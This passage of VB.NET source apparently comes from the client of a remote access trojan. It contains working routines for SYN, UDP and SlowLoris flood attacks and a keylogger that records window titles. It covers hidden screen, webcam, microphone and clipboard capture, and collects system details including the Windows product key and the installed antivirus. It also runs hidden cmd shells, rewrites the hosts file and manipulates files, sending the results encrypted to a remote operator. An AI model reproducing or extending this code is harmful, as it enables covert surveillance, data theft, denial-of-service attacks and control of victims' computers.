659 regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
660 End If
661
662 If startupuser = True Then
663 Dim regkey As RegistryKey
664 regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
665 regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
666 End If
667
668 System.Diagnostics.Process.Start(p)
669 Application.Exit()
670 Catch ex As Exception
671 MsgBox(ex.Message)
672 End Try
673 End Sub
674 Sub removefromstartup(ByVal txt As String)
675 Try
676 If txt.StartsWith("C") Then
677 IO.File.Delete(txt.Replace("|", ""))
678 ElseIf txt.StartsWith("HKEY_CURRENT_USER") Then
679 txt = txt.Replace(txt.Split("\")(0) & "\", "")
680 Dim name As String = txt.Split("|")(1)
681 txt = txt.Replace("\|" & txt.Split("|")(1), "")
682 Dim regkey As RegistryKey = Registry.CurrentUser.OpenSubKey(txt, True)
683 regkey.DeleteValue(name)
684 regkey.Close()
685 ElseIf txt.StartsWith("HKEY_LOCAL_MACHINE") Then
686 txt = txt.Replace(txt.Split("\")(0) & "\", "")
687 Dim name As String = txt.Split("|")(1)
688 txt = txt.Replace("\|" & txt.Split("|")(1), "")
689 Dim regkey As RegistryKey = Registry.LocalMachine.OpenSubKey(txt, True)
690 regkey.DeleteValue(name)
691 regkey.Close()
692 End If
693 Catch
694 End Try
695 End Sub
696 Sub UploadFile(ByVal txt As String)
697 Try
698 'MsgBox(txt.Split("|")(0))
699 'IO.File.WriteAllBytes(txt.Split("|")(0), Convert.FromBase64String(txt.Replace(txt.Split("|")(0) & "|", "")))
700 Catch
701 End Try
702 End Sub
703 Sub StartSlowLoris(ByVal params As String)
704 Try
705 sl.Target = params.Split("|")(0)
706 sl.AOSockets = params.Split("|")(1)
707 sl.AOThreads = params.Split("|")(2)
708 sl.Start()
709 Catch
710 End Try
711 End Sub
712 Sub StartUDP(ByVal params As String)
713 Try
714 If UDPFlood.FloodRunning = True Then
715 Exit Sub
716 Else
717 UDPFlood.Host = params.Split("|")(0)
718 UDPFlood.Port = params.Split("|")(1)
719 UDPFlood.Threads = params.Split("|")(2)
720 UDPFlood.StartUDPFlood()
721 End If
722 Catch
723 End Try
724 End Sub
725 Sub StartSYN(ByVal params As String)
726 Try
727 If SynFlood.IsRunning = True Then
728 Exit Sub
729 Else
730 SynFlood.Host = params.Split("|")(0)
731 SynFlood.Port = params.Split("|")(1)
732 SynFlood.SynSockets = params.Split("|")(2)
733 SynFlood.Threads = params.Split("|")(3)
734 SynFlood.StartSynFlood()
735 End If
736 Catch
737 End Try
738 End Sub
739 Public Function HideTaskBar() As Boolean
740 Try
741 Dim lRet As Long
742 lRet = FindWindow("Shell_traywnd", "")
743 If lRet > 0 Then
744 lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
745 HideTaskBar = lRet > 0
746 End If
747 Return True
748 Catch
749 Return False
750 End Try
751 End Function
752 Public Function ShowTaskBar() As Boolean
753 Try
754 Dim lRet As Long
755 lRet = FindWindow("Shell_traywnd", "")
756 If lRet > 0 Then
757 lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_SHOWWINDOW)
758 ShowTaskBar = lRet > 0
759 End If
760 Return True
761 Catch
762 Return False
763 End Try
764 End Function
765#End Region
766#Region "Information Gathering"
767#Region "Get Country"
768 <DllImport("kernel32.dll")>
769 Private Shared Function GetLocaleInfo(ByVal Locale As UInteger, ByVal LCType As UInteger, <Out()> ByVal lpLCData As System.Text.StringBuilder, ByVal cchData As Integer) As Integer
770 End Function
771
772 Private Const LOCALE_SYSTEM_DEFAULT As UInteger = &H400
773 Private Const LOCALE_SENGCOUNTRY As UInteger = &H1002
774
775 Private Shared Function GetInfo() As String
776 Dim lpLCData As Object = New System.Text.StringBuilder(256)
777 Dim ret As Integer = GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_SENGCOUNTRY, lpLCData, lpLCData.Capacity)
778 If ret > 0 Then
779 Dim s As String = lpLCData.ToString().Substring(0, ret - 1)
780 Return UCase(s.Substring(0, 3))
781 End If
782 Return String.Empty
783 End Function
784#End Region
785 Public Function getpriv() As String
786 Try
787 My.User.InitializeWithWindowsUser()
788
789 If My.User.IsAuthenticated() Then
790 If My.User.IsInRole(ApplicationServices.BuiltInRole.Administrator) Then
791 Return "Admin"
792 ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.User) Then
793 Return "User"
794 ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.Guest) Then
795 Return "Guest"
796 Else
797 Return "Unknown"
798 End If
799 End If
800 Return "Unknown"
801 Catch
802 Return "Unknown"
803 End Try
804 End Function
805 Sub sendprocess()
806 Dim p As New System.Diagnostics.Process()
807 Dim count As Integer = 0
808 Dim Listview1 As New ListView
809 For Each p In System.Diagnostics.Process.GetProcesses(My.Computer.Name)
810 On Error Resume Next
811 Listview1.Items.Add(p.ProcessName & ".exe")
812 Listview1.Items(count).SubItems.Add(FormatNumber(Math.Round(p.PrivateMemorySize64 / 1024), 0) & " K")
813 Listview1.Items(count).SubItems.Add(p.Responding)
814 Listview1.Items(count).SubItems.Add(p.StartTime.ToString().Trim)
815 Listview1.Items(count).SubItems.Add(p.Id)
816 count += 1
817 Next
818
819 Dim Items As String = ""
820 For Each item As ListViewItem In Listview1.Items
821 Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
822 Next
823 Items = Items.Trim
824
825 Send(AES_Encrypt("GetProcess" & Items, enckey))
826 End Sub
827 Sub getinstalledsoftware()
828 Try
829
830 Dim regkey, subkey As Microsoft.Win32.RegistryKey
831 Dim value As String
832 Dim regpath As String = "Software\Microsoft\Windows\CurrentVersion\Uninstall"
833 Dim software As String = String.Empty
834 Dim softwarecount As Integer
835
836 regkey = My.Computer.Registry.LocalMachine.OpenSubKey(regpath)
837 Dim subkeys() As String = regkey.GetSubKeyNames
838 Dim includes As Boolean
839 For Each subk As String In subkeys
840 subkey = regkey.OpenSubKey(subk)
841 value = subkey.GetValue("DisplayName", "")
842 If value <> "" Then
843 includes = True
844 If value.IndexOf("Hotfix") <> -1 Then includes = False
845 If value.IndexOf("Security Update") <> -1 Then includes = False
846 If value.IndexOf("Update for") <> -1 Then includes = False
847 If includes = True Then
848 software += value & "|" & vbCrLf
849 softwarecount += 1
850 End If
851 End If
852 Next
853
854 Dim final As String = "Software|" & softwarecount & "|" & software
855 Send(AES_Encrypt(final, enckey))
856 Catch
857 End Try
858 End Sub
859#Region "System Information"
860 Function getsystem() As String
861 Try
862 Return SystemInformation.ComputerName.ToString() & "|" &
863 SystemInformation.UserName.ToString() & "|" &
864 SystemInformation.VirtualScreen.Width & "|" &
865 SystemInformation.VirtualScreen.Height & "|" &
866 FormatNumber(My.Computer.Info.AvailablePhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" &
867 FormatNumber(My.Computer.Info.AvailableVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" &
868 My.Computer.Info.OSFullName & "|" &
869 My.Computer.Info.OSPlatform & "|" &
870 My.Computer.Info.OSVersion & "|" &
871 FormatNumber(My.Computer.Info.TotalPhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" &
872 FormatNumber(My.Computer.Info.TotalVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" &
873 SystemInformation.PowerStatus.BatteryChargeStatus.ToString() & "|" &
874 SystemInformation.PowerStatus.BatteryFullLifetime.ToString() & "|" &
875 SystemInformation.PowerStatus.BatteryLifePercent.ToString() & "|" &
876 SystemInformation.PowerStatus.BatteryLifeRemaining.ToString() & "|" &
877 GetCPUInfo() & "|" & GetGPUName() & "|" &
878 "(Started: " & StartUp() & ") & (Uptime: " & getUptime() & ")"
879 Catch
880 Return "N/A"
881 End Try
882 End Function
883 Private Function StartUp() As String
884 Try
885 Dim StartDate As DateTime
886 Dim envTicks As Long = Environment.TickCount
887 Dim msToAdd As Long = envTicks - (envTicks * 2)
888 StartDate = DateTime.Now.AddMilliseconds(msToAdd)
889 Return StartDate.ToString
890 Catch
891 Return Nothing
892 End Try
893 End Function
894 Public Function getUptime() As String
895 Try
896 Dim time As String = String.Empty
897 time += Math.Round(Environment.TickCount / 86400000) & " days, "
898 time += Math.Round(Environment.TickCount / 3600000 Mod 24) & " hours, "
899 time += Math.Round(Environment.TickCount / 120000 Mod 60) & " minutes, "
900 time += Math.Round(Environment.TickCount / 1000 Mod 60) & " seconds."
901 Return time
902 Catch
903 Return Nothing
904 End Try
905 End Function
906 Private Function GetCPUInfo() As String
907 Try
908 Dim cpuName As String = Registry.LocalMachine.OpenSubKey("HARDWARE\DESCRIPTION\System\CentralProcessor\0").GetValue("ProcessorNameString")
909 Return cpuName.Replace(" ", " ").Replace(" ", " ")
910 Catch
911 Return Nothing
912 End Try
913 End Function
914 Private Function GetGPUName() As String
915 Dim GraphicsCardName As String = String.Empty
916 Try
917 Dim WmiSelect As New ManagementObjectSearcher _
918 ("root\CIMV2", "SELECT * FROM Win32_VideoController")
919 For Each WmiResults As ManagementObject In WmiSelect.Get()
920 GraphicsCardName = WmiResults.GetPropertyValue("Name").ToString
921 If (Not String.IsNullOrEmpty(GraphicsCardName)) Then
922 Exit For
923 End If
924 Next
925 Catch err As ManagementException
926 End Try
927 Return GraphicsCardName
928 End Function
929#End Region
930#Region "Deep Information"
931 Function GetDeepInfo() As String
932 Try
933 Dim devices As String = String.Empty
934
935 Dim strName As String = Space(100)
936 Dim strVer As String = Space(100)
937 Dim bReturn As Boolean
938 Dim x As Integer = 0
939 Do
940 bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
941 If bReturn Then devices += strName.Trim & "|"
942 x += 1
943 Loop Until bReturn = False
944
945 Dim res As String = String.Empty
946 If devices <> "" Then
947 res = "Yes" : Else : res = "No"
948 End If
949
950 Return "|" & My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOwner", "N/A") & "|" &
951 My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOrganization", "N/A") & "|" &
952 My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Win8", "ProductKey", "N/A") & "|" & NetworkInterface.GetAllNetworkInterfaces()(0).GetPhysicalAddress().ToString & "|" &
953 res & "|" & GetAV() & "|" & Application.ExecutablePath
954 Catch
955 Return ""
956 End Try
957 End Function
958 Function GetAV() As String
959 Dim wmiQuery As Object = "Select * From AntiVirusProduct"
960 Dim objWMIService As Object = GetObject("winmgmts:\\.\root\SecurityCenter2")
961 Dim colItems As Object = objWMIService.ExecQuery(wmiQuery)
962 For Each objItem As Object In colItems
963 On Error Resume Next
964 Return objItem.displayName.ToString()
965 Next
966 Return Nothing
967 End Function
968#End Region
969 Function GetTCPConnections() As String
970 Try
971 Dim s As String = String.Empty
972
973 Dim properties As IPGlobalProperties = IPGlobalProperties.GetIPGlobalProperties()
974 Dim connections() As TcpConnectionInformation = properties.GetActiveTcpConnections()
975
976 For Each c As TcpConnectionInformation In connections
977 s += String.Format("{0}|{1}|{2}", c.LocalEndPoint, c.RemoteEndPoint, c.State) & vbCrLf
978 Next
979
980 Return s.Trim
981 Catch
982 Return Nothing
983 End Try
984 End Function
985 Private Sub GetStartupEntries()
986 Try
987 Dim x As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
988
989 Dim dir As DirectoryInfo = New DirectoryInfo(x)
990 Dim files() As FileInfo = dir.GetFiles
991
992 Dim regkeys(3) As RegistryKey
993
994 regkeys(0) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
995 regkeys(1) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
996 regkeys(2) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
997 regkeys(3) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
998
999 Dim result As String = String.Empty
1000
1001 For Each File As FileInfo In files
1002 result += String.Format("{0}|{1}|{2}", x, File.Name, x & "\" & File.Name) & vbCrLf
1003 Next
1004
1005 For i As Integer = 0 To 3
1006 For Each valueName As String In regkeys(i).GetValueNames()
1007 result += String.Format("{0}|{1}|{2}", regkeys(i).ToString, valueName, regkeys(i).GetValue(valueName)) & vbCrLf
1008 Next
1009 Next
1010
1011 result = result.Trim
1012 Send(AES_Encrypt("Strtp" & result, enckey))
1013 Catch
1014 End Try
1015 End Sub
1016 Sub SendServices()
1017 Dim Listview1 As New ListView
1018 Dim scServices() As ServiceController = ServiceController.GetServices()
1019
1020 For i As Integer = 0 To UBound(scServices)
1021 With Listview1.Items.Add(scServices(i).ServiceName)
1022 .SubItems.Add(scServices(i).DisplayName)
1023 .SubItems.Add(scServices(i).ServiceType.ToString)
1024 .SubItems.Add(scServices(i).Status.ToString)
1025 End With
1026 Next
1027
1028 Dim Items As String = ""
1029 For Each item As ListViewItem In Listview1.Items
1030 Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & vbNewLine
1031 Next
1032 Items = Items.Trim
1033
1034 Send(AES_Encrypt("Services" & Items, enckey))
1035 End Sub
1036 Sub PerformServiceAction(ByVal number As Integer, ByVal Action As String)
1037 Try
1038 Dim scServices() As ServiceController = ServiceController.GetServices()
1039 Select Case Action
1040 Case "Close"
1041 scServices(number).Close()
1042 Case "Continue"
1043 scServices(number).Continue()
1044 Case "Pause"
1045 scServices(number).Pause()
1046 Case "Start"
1047 scServices(number).Start()
1048 Case "Stop"
1049 scServices(number).Stop()
1050 End Select
1051 Catch : End Try
1052 End Sub
1053#End Region
1054#Region "Encryption"
1055 Public Function AES_Encrypt(ByVal input As String, ByVal pass As String) As String
1056 Dim AES As New System.Security.Cryptography.RijndaelManaged
1057 Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
1058 Dim encrypted As String = ""
1059 Try
1060 Dim hash(31) As Byte
1061 Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1062 Array.Copy(temp, 0, hash, 0, 16)
1063 Array.Copy(temp, 0, hash, 15, 16)
1064 AES.Key = hash
1065 AES.Mode = System.Security.Cryptography.CipherMode.ECB
1066 Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
1067 Dim Buffer As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(input)
1068 encrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1069 Return encrypted
1070 Catch
1071 Return Nothing
1072 End Try
1073 End Function
1074 Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
1075 Dim AES As New System.Security.Cryptography.RijndaelManaged
1076 Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
1077 Dim decrypted As String = ""
1078 Try
1079 Dim hash(31) As Byte
1080 Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1081 Array.Copy(temp, 0, hash, 0, 16)
1082 Array.Copy(temp, 0, hash, 15, 16)
1083 AES.Key = hash
1084 AES.Mode = System.Security.Cryptography.CipherMode.ECB
1085 Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
1086 Dim Buffer As Byte() = Convert.FromBase64String(input)
1087 decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1088 Return decrypted
1089 Catch
1090 Return Nothing
1091 End Try
1092 End Function
1093#End Region
1094#Region "Surveillance"
1095#Region "Remote Desktop"
1096 Sub sendscreen()
1097 Try
1098
1099 Dim width As Integer = res.Split("x")(0)
1100 Dim height As Integer = res.Split("x")(1)
1101
1102 Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1103 Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1104 g.CopyFromScreen(0, 0, 0, 0, b.Size)
1105 g.Dispose()
1106
1107 Dim p, pp As New PictureBox
1108 p.Image = b
1109 Dim img As System.Drawing.Image = p.Image
1110 pp.Image = img.GetThumbnailImage(width, height, Nothing, Nothing)
1111 Dim img2 As System.Drawing.Image = pp.Image
1112
1113 Dim bmp1 As New System.Drawing.Bitmap(img2)
1114 Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1115 Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1116 Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1117 Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, comp)
1118 myEncoderParameters.Param(0) = myEncoderParameter
1119 bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg", jgpEncoder, myEncoderParameters)
1120 Send(AES_Encrypt("RemoteDesktop" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")), enckey))
1121 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")
1122 Catch
1123 End Try
1124 End Sub
1125 Private Function GetEncoder(ByVal format As System.Drawing.Imaging.ImageFormat) As System.Drawing.Imaging.ImageCodecInfo
1126 Try
1127 Dim codecs As System.Drawing.Imaging.ImageCodecInfo() = System.Drawing.Imaging.ImageCodecInfo.GetImageDecoders()
1128 Dim codec As System.Drawing.Imaging.ImageCodecInfo
1129 For Each codec In codecs
1130 If codec.FormatID = format.Guid Then
1131 Return codec
1132 End If
1133 Next codec
1134 Return Nothing
1135 Catch
1136 Return Nothing
1137 End Try
1138 End Function
1139#End Region
1140 Sub MouseMov(ByVal txt As String)
1141 Try
1142 If txt.StartsWith("Left") Then
1143 Dim x As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(0)
1144 Dim y As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(1)
1145
1146 SetCursorPos(x, y)
1147 mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
1148 mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
1149 ElseIf txt.StartsWith("Right") Then
1150 Dim x As Integer = txt.Replace("RightSetCurPos", "").Split("x")(0)
1151 Dim y As Integer = txt.Replace("RightSetCurPos", "").Split("x")(1)
1152
1153 SetCursorPos(x, y)
1154 mouse_event(MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
1155 mouse_event(MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)
1156 End If
1157 Catch
1158 End Try
1159 End Sub
1160#Region "Audio"
1161 Sub audio_start()
1162 Try
1163 Dim i As Integer
1164 i = mciSendString("open new type waveaudio alias capture", Nothing, 0, 0)
1165 i = mciSendString("record capture", Nothing, 0, 0)
1166 Catch
1167 End Try
1168 End Sub
1169 Sub audio_stop()
1170 Try
1171 Dim i As Integer
1172 i = mciSendString("save capture " & My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\rec.wav", Nothing, 0, 0)
1173 i = mciSendString("close capture", Nothing, 0, 0)
1174 Catch
1175 End Try
1176 End Sub
1177 Sub audio_get()
1178 Try
1179 Send(AES_Encrypt("RecordingFile" & SystemInformation.ComputerName & "|" & Convert.ToBase64String(File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")), enckey))
1180 File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")
1181 Catch
1182 End Try
1183 End Sub
1184#End Region
1185#Region "Webcam"
1186 Sub listdevices()
1187 Try
1188 Dim devices As String = String.Empty
1189
1190 Dim strName As String = Space(100)
1191 Dim strVer As String = Space(100)
1192 Dim bReturn As Boolean
1193 Dim x As Integer = 0
1194 Do
1195 bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
1196 If bReturn Then devices += strName.Trim & "|"
1197 x += 1
1198 Loop Until bReturn = False
1199 Send(AES_Encrypt("WebcamDevices" & devices, enckey))
1200 Catch
1201 End Try
1202 End Sub
1203 Sub getwebcam()
1204 Try
1205 Dim iHeight As Integer = picCapture.Height
1206 Dim iWidth As Integer = picCapture.Width
1207 hHwnd = capCreateCaptureWindowA(iDevice, WS_VISIBLE Or WS_CHILD, 0, 0, 640, 480, picCapture.Handle.ToInt32, 0)
1208
1209 If SendWebcam(hHwnd, WM_CAP_DRIVER_CONNECT, iDevice, 0) Then
1210 SendWebcam(hHwnd, WM_CAP_SET_SCALE, True, 0)
1211 SendWebcam(hHwnd, WM_CAP_SET_PREVIEWRATE, 66, 0)
1212 SendWebcam(hHwnd, WM_CAP_SET_PREVIEW, True, 0)
1213 SetWebcamPos(hHwnd, HWND_BOTTOM, 0, 0, picCapture.Width, picCapture.Height, SWP_NOMOVE Or SWP_NOZORDER)
1214
1215 Dim data As IDataObject
1216 Dim bmap As System.Drawing.Image
1217 SendWebcam(hHwnd, WM_CAP_EDIT_COPY, 0, 0)
1218 data = Clipboard.GetDataObject()
1219 If data.GetDataPresent(GetType(System.Drawing.Bitmap)) Then
1220 bmap = CType(data.GetData(GetType(System.Drawing.Bitmap)), System.Drawing.Image)
1221 picCapture.Image = bmap
1222
1223 SendWebcam(hHwnd, WM_CAP_DRIVER_DISCONNECT, iDevice, 0)
1224
1225 bmap.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png", System.Drawing.Imaging.ImageFormat.Png)
1226 Send(AES_Encrypt("WebcamSnap" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")), enckey))
1227 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")
1228 End If
1229 Else
1230 DestroyWebcam(hHwnd)
1231 End If
1232 Catch
1233 End Try
1234 End Sub
1235#End Region
1236 Sub SendThumbNail()
1237 Try
1238
1239 Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1240 Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1241 g.CopyFromScreen(0, 0, 0, 0, b.Size)
1242 g.Dispose()
1243
1244 Dim p, pp As New PictureBox
1245 p.Image = b
1246 Dim img As System.Drawing.Image = p.Image
1247 pp.Image = img.GetThumbnailImage(242, 152, Nothing, Nothing)
1248 Dim img2 As System.Drawing.Image = pp.Image
1249
1250 Dim bmp1 As New System.Drawing.Bitmap(img2)
1251 Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1252 Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1253 Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1254 Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, 100L)
1255 myEncoderParameters.Param(0) = myEncoderParameter
1256 bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg", jgpEncoder, myEncoderParameters)
1257 Send(AES_Encrypt("ThumbNail" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")), enckey))
1258 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")
1259 Catch
1260 End Try
1261 End Sub
1262#End Region
1263#Region "Miscellaneous"
1264 Sub loadhostsfile()
1265 Try
1266 Send(AES_Encrypt("HostsFile" & IO.File.ReadAllText("C:\Windows\system32\drivers\etc\hosts"), enckey))
1267 Catch
1268 End Try
1269 End Sub
1270 Sub savehostsfile(ByVal txt As String)
1271 Try
1272 IO.File.WriteAllText("C:\Windows\system32\drivers\etc\hosts", txt)
1273 Catch
1274 End Try
1275 End Sub
1276 Sub getclipboardimage()
1277 Try
1278 If My.Computer.Clipboard.ContainsImage() Then
1279 Dim img As New PictureBox
1280 img.Image = My.Computer.Clipboard.GetImage()
1281 img.Image.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1282 Else
1283 Dim Bmp As New System.Drawing.Bitmap(397, 187, Imaging.PixelFormat.Format32bppPArgb)
1284 Bmp.SetResolution(397, 187)
1285 Dim G As System.Drawing.Graphics = Graphics.FromImage(Bmp)
1286 G.Clear(Color.White)
1287 G.InterpolationMode = Drawing2D.InterpolationMode.HighQualityBicubic
1288 G.SmoothingMode = Drawing2D.SmoothingMode.AntiAlias
1289 G.TextRenderingHint = Drawing.Text.TextRenderingHint.AntiAlias
1290 Dim F As New Font("Arial", 3)
1291 Dim B As New SolidBrush(Color.Red)
1292 G.DrawString("The Clipboard does not have any Images!", F, B, 12, 12)
1293
1294 Bmp.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1295 End If
1296
1297 Send(AES_Encrypt("CPImage" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")), enckey))
1298 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1299 Catch
1300 End Try
1301 End Sub
1302 Sub getclipboardtext()
1303 Try
1304 If My.Computer.Clipboard.ContainsText() = True Then
1305 Send(AES_Encrypt("CPText" & My.Computer.Clipboard.GetText(), enckey))
1306 End If
1307 Catch
1308 End Try
1309 End Sub
1310 Sub setclipboardtext(ByVal text As String)
1311 Try
1312 My.Computer.Clipboard.SetText(text)
1313 Catch
1314 End Try
1315 End Sub
1316 Sub runshell(cmd As String)
1317 Try
1318 Dim p As New System.Diagnostics.Process
1319 Dim i As New System.Diagnostics.ProcessStartInfo("cmd")
1320 i.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
1321 i.Arguments = "/C " & cmd
1322 i.RedirectStandardOutput = True
1323 i.UseShellExecute = False
1324 i.CreateNoWindow = True
1325 i.ErrorDialog = False
1326 p.StartInfo = i
1327 p.Start()
1328 Dim output As String = p.StandardOutput.ReadToEnd
1329
1330 Send(AES_Encrypt("Shell" & output, enckey))
1331 Catch
1332 End Try
1333 End Sub
1334#End Region
1335 Private Function GetActiveWindowTitle() As String
1336 Dim MyStr As String
1337 MyStr = New String(Chr(0), 100)
1338 GetWindowText(GetForegroundWindow, MyStr, 100)
1339 MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
1340 Return MyStr
1341 End Function
1342 Private Sub logger_Down(Key As String) Handles logger.Down
1343 Call APPU()
1344 logs &= Key
1345 End Sub
1346 Sub APPU()
1347 If strin <> GetActiveWindowTitle() Then
1348 logs = logs & vbCrLf & vbCrLf & "[" & My.Computer.Clock.LocalTime.Date & " " & My.Computer.Clock.LocalTime.Hour & ":" & My.Computer.Clock.LocalTime.Minute & ":" & My.Computer.Clock.LocalTime.Second & " | " & GetActiveWindowTitle() & "]" + vbNewLine & vbNewLine
1349 strin = GetActiveWindowTitle()
1350 End If
1351 End Sub
1352 Sub listdrives()
1353 Try
1354 Dim drives As String = String.Empty
1355 For Each drive As IO.DriveInfo In IO.DriveInfo.GetDrives
1356 Dim ltr As String = drive.Name
1357 If drive.IsReady AndAlso drive.VolumeLabel <> "" Then
1358 Else
1359 End If
1360 drives += ltr & "|"
1361 Next
1362 Send(AES_Encrypt("Drives" & drives, enckey))
1363 Catch
1364 End Try
1365 End Sub
1366 Sub showfiles(path As String)
1367 Try
1368 listviewfiles.Items.Clear()
1369 curntdir2 = ""
1370 For Each Dir As String In Directory.GetDirectories(path)
1371 Dir = Dir.Replace(path, "")
1372 Dim d As New DirectoryInfo(path & Dir & "\")
1373 With listviewfiles.Items.Add(Dir, 0)
1374 .SubItems.Add(d.CreationTime)
1375 .SubItems.Add(d.LastAccessTime)
1376 .SubItems.Add("")
1377 .SubItems.Add("1")
1378 End With
1379 Next
1380
1381 Dim file As String
1382 file = Dir$(path)
1383 Do While Len(file)
1384 Dim f As New FileInfo(path & file)
1385 With listviewfiles.Items.Add(file)
1386 .SubItems.Add(f.CreationTime)
1387 .SubItems.Add(f.LastAccessTime)
1388 .SubItems.Add(Format((f.Length / 1024) / 1024, "###,###,##0.00") & " MB")
1389 .SubItems.Add("0")
1390 End With
1391 file = Dir$()
1392 Loop
1393 curntdir2 = path
1394
1395 Dim Items As String = curntdir2 & "|"
1396 For Each item As ListViewItem In listviewfiles.Items
1397 Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
1398 Next
1399 Items = Items.Trim
1400
1401 Send(AES_Encrypt("FileManagerFiles" & Items, enckey))
1402 Catch
1403 End Try
1404 End Sub
1405 Sub createnewdirectory(ByVal path As String)
1406 Try
1407 My.Computer.FileSystem.CreateDirectory(path)
1408 Catch
1409 End Try
1410 End Sub
1411 Sub deletedirectory(ByVal path As String)
1412 Try
1413 My.Computer.FileSystem.DeleteDirectory(path, FileIO.DeleteDirectoryOption.DeleteAllContents)
1414 Catch
1415 End Try
1416 End Sub
1417 Sub renamedirectory(ByVal path As String, ByVal newname As String)
1418 Try
1419 My.Computer.FileSystem.RenameDirectory(path, newname)
1420 Catch
1421 End Try
1422 End Sub
1423 Sub movedirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1424 Try
